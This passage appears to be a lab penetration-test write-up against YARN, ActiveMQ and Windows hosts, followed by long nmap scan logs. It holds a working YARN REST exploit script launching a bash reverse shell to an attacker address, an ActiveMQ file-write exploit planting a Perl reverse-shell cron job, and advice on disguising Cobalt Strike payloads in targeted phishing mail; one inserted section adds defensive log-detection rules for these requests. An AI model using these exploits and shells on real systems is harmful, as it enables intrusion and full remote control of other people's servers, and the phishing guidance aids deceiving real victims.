lhost = '192.168.1.2'                # attacker machine address; the listener is on port 8888

url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
    'application-id': app_id,
    'application-name': 'get-shell',
    'am-container-spec': {
        'commands': {
            'command': '/bin/bash -i >& /dev/tcp/%s/8888 0>&1' % lhost,
        },
    },
    'application-type': 'YARN',
}
requests.post(url, json=data)

Listen on port 8888

(base) ➜ ~ nc -l 8888
bash: cannot set terminal process group (211): Inappropriate ioctl for device
bash: no job control in this shell
<33412_0001/container_1596872533412_0001_01_000001# whoami
whoami
root
<33412_0001/container_1596872533412_0001_01_000001# ifconfig
ifconfig
eth0      Link encap:Ethernet  HWaddr 02:42:ac:1a:00:02  
          inet addr:172.26.0.2  Bcast:172.26.255.255  Mask:255.255.0.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:17365 errors:0 dropped:0 overruns:0 frame:0
          TX packets:34456 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:1858357 (1.7 MiB)  TX bytes:5760591 (5.4 MiB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:8 errors:0 dropped:0 overruns:0 frame:0
          TX packets:8 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:647 (647.0 B)  TX bytes:647 (647.0 B)

<33412_0001/container_1596872533412_0001_01_000001# id
id
uid=0(root) gid=0(root) groups=0(root)
<33412_0001/container_1596872533412_0001_01_000001# 

We now have a shell on the Ubuntu Linux server.


The host also exposes port 8161; opening it in a browser shows an ActiveMQ instance, which has an arbitrary file write vulnerability.

PUT /fileserver/1.txt HTTP/1.1
Host: 10.211.55.6:8161
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 249

*/1 * * * * root /usr/bin/perl -e 'use Socket;$i="192.168.1.2";$p=21;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
##

Intercept the request with Burp Suite, modify it to write the payload, and replay it; a 204 response indicates success.

Then move the uploaded file into place:

MOVE /fileserver/1.txt HTTP/1.1
Destination: file:///etc/cron.d/root/1.txt
Host: 10.211.55.6:8161
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 6

test

Listen on the port and wait for the reverse shell to connect back.
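Both Linux footholds on this page leave an unmistakable trace at the HTTP layer: the YARN ResourceManager REST API on 8088 accepted a POST to /ws/v1/cluster/apps/new-application followed by a POST to /ws/v1/cluster/apps from an address that never submits jobs, and the ActiveMQ web console on 8161 accepted a PUT and then a MOVE against /fileserver/. (Note also that the shell obtained through YARN runs as root inside a YARN container, as the container id in the prompt and the 172.26.0.2 address show.) The following Python is an added example, not part of the original post: it runs two detection rules over request-log lines in NCSA common format, the format a reverse proxy in front of these ports or Jetty's own request log would produce. The log lines are constructed to mirror the requests shown above, and the allow-list of legitimate job submitters is an assumption for the example.

```python
import re
from datetime import datetime

# NCSA common log format: src ident user [timestamp] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Assumption for the example: the only hosts that should ever submit YARN applications.
ALLOWED_SUBMITTERS = {"10.211.55.6", "10.211.55.20"}

YARN_SUBMIT_PATHS = ("/ws/v1/cluster/apps/new-application", "/ws/v1/cluster/apps")
ACTIVEMQ_WRITE_METHODS = ("PUT", "MOVE")


def parse_line(line):
    """Return a dict for a well-formed log line, or None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def classify(rec):
    """Name the finding a request represents, or None if it looks benign."""
    path = rec["path"].split("?", 1)[0].rstrip("/")
    accepted = 200 <= rec["status"] < 300
    # Rule 1: application submission through the RM REST API from an unexpected
    # source. A 2xx answer means the ResourceManager accepted it without auth.
    if (rec["method"] == "POST" and path in YARN_SUBMIT_PATHS and accepted
            and rec["src"] not in ALLOWED_SUBMITTERS):
        return "yarn-rest-app-submission"
    # Rule 2: any write-type method that the ActiveMQ fileserver servlet accepted.
    if rec["method"] in ACTIVEMQ_WRITE_METHODS and path.startswith("/fileserver") and accepted:
        return "activemq-fileserver-write"
    return None


def scan(lines):
    """Run both rules over an iterable of log lines; unparsable lines are skipped."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        name = classify(rec)
        if name:
            findings.append((rec["ts"].isoformat(), rec["src"], rec["method"], rec["path"], name))
    return findings


# Constructed sample log lines mirroring the requests shown on this page.
SAMPLE_LOG = [
    '10.211.55.20 - - [08/Aug/2020:19:50:02 +0800] "GET /cluster HTTP/1.1" 200 5123',
    '10.211.55.20 - - [08/Aug/2020:19:50:10 +0800] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 200 97',
    '192.168.1.2 - - [08/Aug/2020:19:55:01 +0800] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 200 97',
    '192.168.1.2 - - [08/Aug/2020:19:55:01 +0800] "POST /ws/v1/cluster/apps HTTP/1.1" 202 0',
    '192.168.1.2 - - [08/Aug/2020:20:05:33 +0800] "PUT /fileserver/1.txt HTTP/1.1" 204 0',
    '192.168.1.2 - - [08/Aug/2020:20:06:10 +0800] "MOVE /fileserver/1.txt HTTP/1.1" 204 0',
    '10.211.55.5 - - [08/Aug/2020:20:07:00 +0800] "GET /fileserver/readme.txt HTTP/1.1" 404 0',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding)
```

The rules deliberately key on the response code: a rejected submission or a 4xx on the fileserver is noise, whereas a 2xx on either path is the service confirming that it did what the request asked.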


For the Windows 10 host, a payload generated with Cobalt Strike plus social engineering is needed to get a user to run it.

Start the Cobalt Strike team server

Start the client

Disguise the generated payload and send a phishing e-mail to the client.

Phishing e-mail subject: it must fit the client's line of business; don't send something that has nothing to do with them. If their business is energy and you send an e-mail about the power grid sector, it will not be opened. The generated payload also needs AV evasion, which will be covered next time.



Privilege escalation

Penetration test log

Port scan

Nmap scan report for 10.211.55.130Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.130 are filtered
Nmap scan report for 10.211.55.131Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.131 are filtered
Nmap scan report for 10.211.55.132Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.132 are filtered
Nmap scan report for 10.211.55.133Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.133 are filtered
Nmap scan report for 10.211.55.134Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.134 are filtered
Nmap scan report for 10.211.55.135Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.135 are filtered
Nmap scan report for 10.211.55.136Host is up (0.000027s latency).All 1000 scanned ports on 10.211.55.136 are filtered
Nmap scan report for 10.211.55.137Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.137 are filtered
Nmap scan report for 10.211.55.138Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.138 are filtered
Nmap scan report for 10.211.55.139Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.139 are filtered
Nmap scan report for 10.211.55.140Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.140 are filtered
Nmap scan report for 10.211.55.141Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.141 are filtered
Nmap scan report for 10.211.55.142Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.142 are filtered
Nmap scan report for 10.211.55.143Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.143 are filtered
Nmap scan report for 10.211.55.144Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.144 are filtered
Nmap scan report for 10.211.55.145Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.145 are filtered
Nmap scan report for 10.211.55.146Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.146 are filtered
Nmap scan report for 10.211.55.147Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.147 are filtered
Nmap scan report for 10.211.55.148Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.148 are filtered
Nmap scan report for 10.211.55.149Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.149 are filtered
Nmap scan report for 10.211.55.150Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.150 are filtered
Nmap scan report for 10.211.55.151Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.151 are filtered
Nmap scan report for 10.211.55.152Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.152 are filtered
Nmap scan report for 10.211.55.153Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.153 are filtered
Nmap scan report for 10.211.55.154Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.154 are filtered
Nmap scan report for 10.211.55.155Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.155 are filtered
Nmap scan report for 10.211.55.156Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.156 are filtered
Nmap scan report for 10.211.55.157Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.157 are filtered
Nmap scan report for 10.211.55.158Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.158 are filtered
Nmap scan report for 10.211.55.159Host is up (0.000029s latency).All 1000 scanned ports on 10.211.55.159 are filtered
Nmap scan report for 10.211.55.160Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.160 are filtered
Nmap scan report for 10.211.55.161Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.161 are filtered
Nmap scan report for 10.211.55.162Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.162 are filtered
Nmap scan report for 10.211.55.163Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.163 are filtered
Nmap scan report for 10.211.55.164Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.164 are filtered
Nmap scan report for 10.211.55.165Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.165 are filtered
Nmap scan report for 10.211.55.166Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.166 are filtered
Nmap scan report for 10.211.55.167Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.167 are filtered
Nmap scan report for 10.211.55.168Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.168 are filtered
Nmap scan report for 10.211.55.169Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.169 are filtered
Nmap scan report for 10.211.55.170Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.170 are filtered
Nmap scan report for 10.211.55.171Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.171 are filtered
Nmap scan report for 10.211.55.172Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.172 are filtered
Nmap scan report for 10.211.55.173Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.173 are filtered
Nmap scan report for 10.211.55.174Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.174 are filtered
Nmap scan report for 10.211.55.175Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.175 are filtered
Nmap scan report for 10.211.55.176Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.176 are filtered
Nmap scan report for 10.211.55.177Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.177 are filtered
Nmap scan report for 10.211.55.178Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.178 are filtered
Nmap scan report for 10.211.55.179Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.179 are filtered
Nmap scan report for 10.211.55.180Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.180 are filtered
Nmap scan report for 10.211.55.181Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.181 are filtered
Nmap scan report for 10.211.55.182Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.182 are filtered
Nmap scan report for 10.211.55.183Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.183 are filtered
Nmap scan report for 10.211.55.184Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.184 are filtered
Nmap scan report for 10.211.55.185Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.185 are filtered
Nmap scan report for 10.211.55.186Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.186 are filtered
Nmap scan report for 10.211.55.187Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.187 are filtered
Nmap scan report for 10.211.55.188Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.188 are filtered
Nmap scan report for 10.211.55.189Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.189 are filtered
Nmap scan report for 10.211.55.190Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.190 are filtered
Nmap scan report for 10.211.55.191Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.191 are filtered
Nmap scan report for 10.211.55.192Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.192 are filtered
Nmap scan report for 10.211.55.193Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.193 are filtered
Nmap scan report for 10.211.55.194Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.194 are filtered
Nmap scan report for 10.211.55.195Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.195 are filtered
Nmap scan report for 10.211.55.196Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.196 are filtered
Nmap scan report for 10.211.55.197Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.197 are filtered
Nmap scan report for 10.211.55.198Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.198 are filtered
Nmap scan report for 10.211.55.199Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.199 are filtered
Nmap scan report for 10.211.55.200Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.200 are filtered
Nmap scan report for 10.211.55.201Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.201 are filtered
Nmap scan report for 10.211.55.202Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.202 are filtered
Nmap scan report for 10.211.55.203Host is up (0.00063s latency).All 1000 scanned ports on 10.211.55.203 are filtered
Nmap scan report for 10.211.55.204Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.204 are filtered
Nmap scan report for 10.211.55.205Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.205 are filtered
Nmap scan report for 10.211.55.206Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.206 are filtered
Nmap scan report for 10.211.55.207Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.207 are filtered
Nmap scan report for 10.211.55.208Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.208 are filtered
Nmap scan report for 10.211.55.209Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.209 are filtered
Nmap scan report for 10.211.55.210Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.210 are filtered
Nmap scan report for 10.211.55.211Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.211 are filtered
Nmap scan report for 10.211.55.212Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.212 are filtered
Nmap scan report for 10.211.55.213Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.213 are filtered
Nmap scan report for 10.211.55.214Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.214 are filtered
Nmap scan report for 10.211.55.215Host is up (0.000026s latency).All 1000 scanned ports on 10.211.55.215 are filtered
Nmap scan report for 10.211.55.216Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.216 are filtered
Nmap scan report for 10.211.55.217Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.217 are filtered
Nmap scan report for 10.211.55.218Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.218 are filtered
Nmap scan report for 10.211.55.219Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.219 are filtered
Nmap scan report for 10.211.55.220Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.220 are filtered
Nmap scan report for 10.211.55.221Host is up (0.000027s latency).All 1000 scanned ports on 10.211.55.221 are filtered
Nmap scan report for 10.211.55.222Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.222 are filtered
Nmap scan report for 10.211.55.223Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.223 are filtered
Nmap scan report for 10.211.55.224Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.224 are filtered
Nmap scan report for 10.211.55.225Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.225 are filtered
Nmap scan report for 10.211.55.226Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.226 are filtered
Nmap scan report for 10.211.55.227Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.227 are filtered
Nmap scan report for 10.211.55.228Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.228 are filtered
Nmap scan report for 10.211.55.229Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.229 are filtered
Nmap scan report for 10.211.55.230Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.230 are filtered
Nmap scan report for 10.211.55.231Host is up (0.000028s latency).All 1000 scanned ports on 10.211.55.231 are filtered
Nmap scan report for 10.211.55.232Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.232 are filtered
Nmap scan report for 10.211.55.233Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.233 are filtered
Nmap scan report for 10.211.55.234Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.234 are filtered
Nmap scan report for 10.211.55.235Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.235 are filtered
Nmap scan report for 10.211.55.236Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.236 are filtered
Nmap scan report for 10.211.55.237Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.237 are filtered
Nmap scan report for 10.211.55.238Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.238 are filtered
Nmap scan report for 10.211.55.239Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.239 are filtered
Nmap scan report for 10.211.55.240Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.240 are filtered
Nmap scan report for 10.211.55.241Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.241 are filtered
Nmap scan report for 10.211.55.242Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.242 are filtered
Nmap scan report for 10.211.55.243Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.243 are filtered
Nmap scan report for 10.211.55.244Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.244 are filtered
Nmap scan report for 10.211.55.245Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.245 are filtered
Nmap scan report for 10.211.55.246Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.246 are filtered
Nmap scan report for 10.211.55.247Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.247 are filtered
Nmap scan report for 10.211.55.248Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.248 are filtered
Nmap scan report for 10.211.55.249Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.249 are filtered
Nmap scan report for 10.211.55.250Host is up (0.000027s latency).All 1000 scanned ports on 10.211.55.250 are filtered
Nmap scan report for 10.211.55.251Host is up (0.000032s latency).All 1000 scanned ports on 10.211.55.251 are filtered
Nmap scan report for 10.211.55.252Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.252 are filtered
Nmap scan report for 10.211.55.253Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.253 are filtered
Nmap scan report for 10.211.55.254Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.254 are filtered
Nmap scan report for 10.211.55.255Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.255 are filtered
Nmap done: 256 IP addresses (256 hosts up) scanned in 127.90 seconds
(base) ➜ ~ sudo nmap -sS -p 1-65535 -v 10.211.55.5
Password:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:37 CST
Initiating ARP Ping Scan at 19:37
Scanning 10.211.55.5 [1 port]
Completed ARP Ping Scan at 19:37, 0.00s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 19:37
Scanning windows-10.shared (10.211.55.5) [65535 ports]
Discovered open port 135/tcp on 10.211.55.5
Discovered open port 139/tcp on 10.211.55.5
Discovered open port 445/tcp on 10.211.55.5
Discovered open port 49664/tcp on 10.211.55.5
Discovered open port 49669/tcp on 10.211.55.5
Discovered open port 5040/tcp on 10.211.55.5
Discovered open port 49667/tcp on 10.211.55.5
Discovered open port 49668/tcp on 10.211.55.5
Discovered open port 49665/tcp on 10.211.55.5
Discovered open port 49671/tcp on 10.211.55.5
Discovered open port 49666/tcp on 10.211.55.5
Completed SYN Stealth Scan at 19:37, 41.72s elapsed (65535 total ports)
Nmap scan report for windows-10.shared (10.211.55.5)
Host is up (0.00018s latency).
Not shown: 65524 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
5040/tcp  open  unknown
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49671/tcp open  unknown
MAC Address: 00:1C:42:F4:4F:FE (Parallels)

Read data files from: /usr/local/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 41.79 seconds
           Raw packets sent: 69291 (3.049MB) | Rcvd: 65536 (2.621MB)
(base) ➜ ~ nmap -O 10.211.55.5
TCP/IP fingerprinting (for OS scan) requires root privileges.
QUITTING!
(base) ➜ ~ nmap -Pn -O 10.211.55.5
TCP/IP fingerprinting (for OS scan) requires root privileges.
QUITTING!
(base) ➜ ~ sudo nmap -O 10.211.55.5
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:40 CST
Nmap scan report for windows-10.shared (10.211.55.5)
Host is up (0.00022s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:1C:42:F4:4F:FE (Parallels)
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows Longhorn|10|2008|7|Vista|8.1 (94%)
OS CPE: cpe:/o:microsoft:windows cpe:/o:microsoft:windows_10:1703 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_8.1
Aggressive OS guesses: Microsoft Windows Longhorn (94%), Microsoft Windows 10 1703 (92%), Microsoft Windows 10 1511 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 SP2 (91%), Microsoft Windows 7 SP1 (91%), Microsoft Windows 8.1 Update 1 (91%), Microsoft Windows 8 (91%), Microsoft Windows 10 1607 (91%), Microsoft Windows Vista SP1 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 5.43 seconds
(base) ➜ ~ sudo nmap -sS -p 1-65535 -v 10.211.55.6
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:41 CST
Initiating ARP Ping Scan at 19:41
Scanning 10.211.55.6 [1 port]
Completed ARP Ping Scan at 19:41, 0.00s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 19:41
Scanning ubuntu-linux20.04.shared (10.211.55.6) [65535 ports]
Discovered open port 22/tcp on 10.211.55.6
Discovered open port 61616/tcp on 10.211.55.6
Discovered open port 8161/tcp on 10.211.55.6
Discovered open port 8088/tcp on 10.211.55.6
Completed SYN Stealth Scan at 19:41, 0.55s elapsed (65535 total ports)
Nmap scan report for ubuntu-linux20.04.shared (10.211.55.6)
Host is up (0.000046s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
8088/tcp  open  radan-http
8161/tcp  open  patrol-snmp
61616/tcp open  unknown
MAC Address: 00:1C:42:B7:60:2B (Parallels)

Read data files from: /usr/local/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.61 seconds
           Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)
(base) ➜ ~ sudo nmap -O 10.211.55.6
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:42 CST
Nmap scan report for ubuntu-linux20.04.shared (10.211.55.6)
Host is up (0.00019s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
8088/tcp open  radan-http
MAC Address: 00:1C:42:B7:60:2B (Parallels)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=8/8%OT=22%CT=1%CU=37942%PV=Y%DS=1%DC=D%G=Y%M=001C42%TM
OS:=5F2E8FA2%P=x86_64-apple-darwin19.0.0)SEQ(SP=101%GCD=1%ISR=10D%TI=Z%CI=Z
OS:%II=I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11
OS:NW7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE
OS:88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=4
OS:0%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O
OS:=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40
OS:%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q
OS:=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y
OS:%DFI=N%T=40%CD=S)

Network Distance: 1 hop

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.23 seconds
(base) ➜ ~ sudo nmap -sS -p 1-65535 -v 10.211.55.8
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:43 CST
Initiating ARP Ping Scan at 19:43
Scanning 10.211.55.8 [1 port]
Completed ARP Ping Scan at 19:43, 0.00s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 19:43
Scanning windows-7sp1.shared (10.211.55.8) [65535 ports]
Discovered open port 445/tcp on 10.211.55.8
Discovered open port 135/tcp on 10.211.55.8
Discovered open port 139/tcp on 10.211.55.8
Discovered open port 49157/tcp on 10.211.55.8
Discovered open port 49156/tcp on 10.211.55.8
Discovered open port 49153/tcp on 10.211.55.8
Discovered open port 49155/tcp on 10.211.55.8
Discovered open port 49154/tcp on 10.211.55.8
Discovered open port 49152/tcp on 10.211.55.8
Completed SYN Stealth Scan at 19:44, 40.56s elapsed (65535 total ports)
Nmap scan report for windows-7sp1.shared (10.211.55.8)
Host is up (0.00010s latency).
Not shown: 65526 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown
MAC Address: 00:1C:42:B2:9C:23 (Parallels)

Read data files from: /usr/local/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 40.63 seconds
           Raw packets sent: 69424 (3.055MB) | Rcvd: 65537 (2.622MB)
(base) ➜ ~ sudo nmap -O 10.211.55.8
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:44 CST
Nmap scan report for windows-7sp1.shared (10.211.55.8)
Host is up (0.00017s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown
MAC Address: 00:1C:42:B2:9C:23 (Parallels)
Device type: general purpose
Running: Microsoft Windows 7|2008|8.1
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.78 seconds
(base) ➜ ~ nmap -O 10.211.55.8
TCP/IP fingerprinting (for OS scan) requires root privileges.
QUITTING!
(base) ➜ ~ sudo nmap -O 10.211.55.8
Password:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 20:13 CST
Nmap scan report for windows-7sp1.shared (10.211.55.8)
Host is up (0.00018s latency).
Not shown: 990 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
